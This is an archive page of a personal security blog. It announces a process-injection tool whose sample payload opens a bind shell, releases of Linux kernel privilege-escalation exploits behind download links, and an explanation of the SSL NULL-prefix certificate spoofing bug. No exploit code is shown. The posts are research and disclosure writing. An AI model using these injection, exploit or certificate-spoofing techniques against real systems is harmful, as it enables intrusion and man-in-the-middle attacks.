Archive

Archive for the ‘Security’ Category

Migrating an EJBCA database from H2 to mysql

May 13th, 2016 No comments

As part of a job I had to migrate an EJBCA database from H2 to mysql. Some coworkers who tried migrating the database could not complete the job because most tools they used couldn’t open the H2 database or had problems with binary blobs. Googling ‘ejbca migrate h2 to mysql’ yielded the following result: https://sourceforge.net/p/ejbca/discussion/123123/thread/c9fb72aa/. According to Tomas Gustavsson, author of EJBCA, this is not trivial and “PrimeKey has developed a standalone database dump/restore tool that can be used to dump from one database and import into anohter. This is only available with a commercial support subscription though.” As far as I know, commercial support costs 9k per year. So, I decided to write my own migration tool. After less than 80 lines of java code everything was complete, and I migrated my database without any problems. You can download the tool here. There are no warranties that it will work correctly, but in my case it worked just fine. You can run it using the following command:

It may also work using other databases, you just have to use the correct connector and URL for the connection. If you try it with another database, such as postgresql, please leave a comment.

Categories: PKI, Security Tags:

PreZ: my new injector!

March 25th, 2010 5 comments

Together with my presentation at 0x375 0x2 (check previous post), I wrote a proof of concept program, PreZ! What it does is create a new thread at a running program. I will give a small description of the way it works. The images below are taken from the presentation and refer to the linux version but the same concept is used in all versions, i.e. linux, freebsd and opensolaris.

PreZ consists of three parts, the injector, the thread creation code and the code that will be executed at the new thread (the shell code). The following steps take place each time you run PreZ.

At the beginning the injector stops the traced process, the ‘victim’. It’s state is saved (registers and some other stuff at the opensolaris version) and part of the code at the place where the EIP register points to. This code is then overwritten with the other two parts so we have the modified address space at the image above. The execution then continues and the new code we just injected runs.

What the new code does is mmap a new space with read, write and execute permissions (the orange space at the image above). Then, the shellcode at the end is copied to this new location. All this runs in a single thread (the purple thread of execution at the image). A new thread is spawned and now we have two different threads of execution, the green and the pink at the image above.

Finally, the new thread jumps to the place where we copied the new code and the original thread executes an int3 instruction. When this instruction is executed, the injector catches the trap and knows that the thread has been created successfully. The original code read at the beginning is restored, the state is restored, and finally execution continues. All these are transparent to the original process which can’t understand that the injected code has been executed.

PreZ v1.0 can be downloaded from this link. The sample code for the new thread listens for a connection to port 65226 and when it accepts one it spawns a shell. You can do much more, this is just a simple code to demonstrate the injection process.

Categories: Linux, Programming, Security Tags:

My 0x375 presentation – injecting code at a running process!

March 22nd, 2010 2 comments

It’s been a LOT of time since I last posted to my blog. Unfortunately, I’ve been too busy to write something even if I had some ideas. So, here is my first post after more than a month of absence!

I recently made a presentation at the 0x375 (Thessaloniki Tech Talk Sessions). You can find more info about 0x375 at the grhack site. In short, it is a series of some tech talk session where anyone can present his work on a subject. Submissions are open for everyone. There are no regular dates but if you watch the site you can find info about when and where the next event will take place (always at Thessaloniki and till now at the Aristotle University).

My presentation was about injecting code at a running process and running it as a separate thread. You can download it here. Since 0x375 takes place in Greece the presentation is written in Greek, sorry if you can’t ready it! In short what the technique I presented and the accompanying program does is create a new thread at a running process. The presentation talks about Linux, however a freebsd and an opensolaris version are ready. I will put them online soon so you can check it out. Wait for the next post!

Categories: Linux, Programming, Security Tags:

Linux kernel pipe NULL pointer dereference exploit (CVE-2009-3547)

November 5th, 2009 6 comments

Another exploit for the kernel pipe NULL pointer dereference bug. This one is inspired by Spender‘s great work for his enlightenment framework. It seems to exist at every 2.6 and 2.4 kernel version I’ve tested! Another sock_sendpage maybe? This sample exploit only works for versions >= 2.6.17. You can download it here. As usual more information in the code. This time there are some funny quotes too! I haven’t done a lot of tests, so any feedback, and especially versions you have tested it and it worked, is welcome!

EDIT: New version is out. It adds support for the detection of kernels compiled with spinlock debugging options. Download it here.

Categories: Exploits, Security Tags:

Ecryptfs NULL pointer dereference exploit (CVE-2009-2908)

October 17th, 2009 1 comment

Commit afc2b6932f48f200736d3e36ad66fee0ec733136 at the linux kernel is about a NULL pointer dereference that happens under certain circumstances. As many of you already know, NULL pointer dereferences are exploitable and are actually a “hot topic” lately. You can find a lot of references, such as Julien Tinnes’ great blog post, Brad Spender‘s enlightenment framework, etc. I haven’t seen any exploits for this bug yet so I’ve written one. You can download it here. I won’t go into details here, you can read the source code which is full of helpful comments. A description of the exploit would be actually a copy/paste of all the comments here, so it’s better to read the entire source code!

Categories: Exploits, Security Tags:

The NULL certificate prefix bug

October 3rd, 2009 5 comments

Before some months, at the Black Hat 2009, Moxie Marlinspikes and Dan Kaminsky presented a vulnerability that exists at some implementations of SSL.

It’s concept is pretty simple, you request a certificate having as a CN (common name) www.paypal.com\x00.example.com. This can be easy, especially for some public key infrastructures operated by companies for their internal needs, where server certificates are issued automatically as long as the CN is a host under a specific domain. However, since many SSL implementations use strcmp for validating the remote host, they will only check if the host is equal to the part before \x00! So a malicious user can simply issue such a certificate and using spoofing he can start a man in the middle attack. Furthermore, it is possible to issue a certificate with a CN such as *.paypal.com\x00.example.com which will match all hosts under the paypal.com domain. Or even the CN *\x00.example.com which will match… everything! Jacob Appelbaum has created such a certificate and posted it to the Noisebridge-discuss mailing list.

Firefox 3.5.2 and 3.0.13 have fixed this vulnerability, however I checked with the Internet Explorer browser today and it still has this bug. The test was done at a friend’s pc so I don’t know exactly the patches he has applied or when he last run windows update. It is very interesting that it probably uses the strcpy function for copying the value of CN to the buffer where it keeps the certificate information so when you try to see them, you only see www.paypal.com!

You can use the following program to create your own certificate requests. You run it as follows:

At the output you will get the private key and the certificate request.

Categories: Programming, Security Tags:

Full disclosure… or not?

September 26th, 2009 2 comments

One of the biggest problems I face sometimes is what should I do when I find a bug. I recently found a bug at the linux kernel version 2.6.30, which was fixed at 2.6.31, but I only told it to a friend of mine. Posting the description to a mailing list or at my blog would mean that everybody could write an exploit and use it to hack into systems. I could also write a patch which could be merged at the next release. For the moment I chose not to do anything until the next kernel release and if it wasn’t fixed I would then decide what should I do.
I face the same problem when I write security related programs. For example, a rootkit that can be used for malicious purposes can also be used to demonstrate bugs at the design of an operating system. Should a program like this be released?
I have created the following two polls. I believe that the results are going to be very interesting!

Categories: Security Tags:
SEO Powered by Platinum SEO from Techblissonline

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close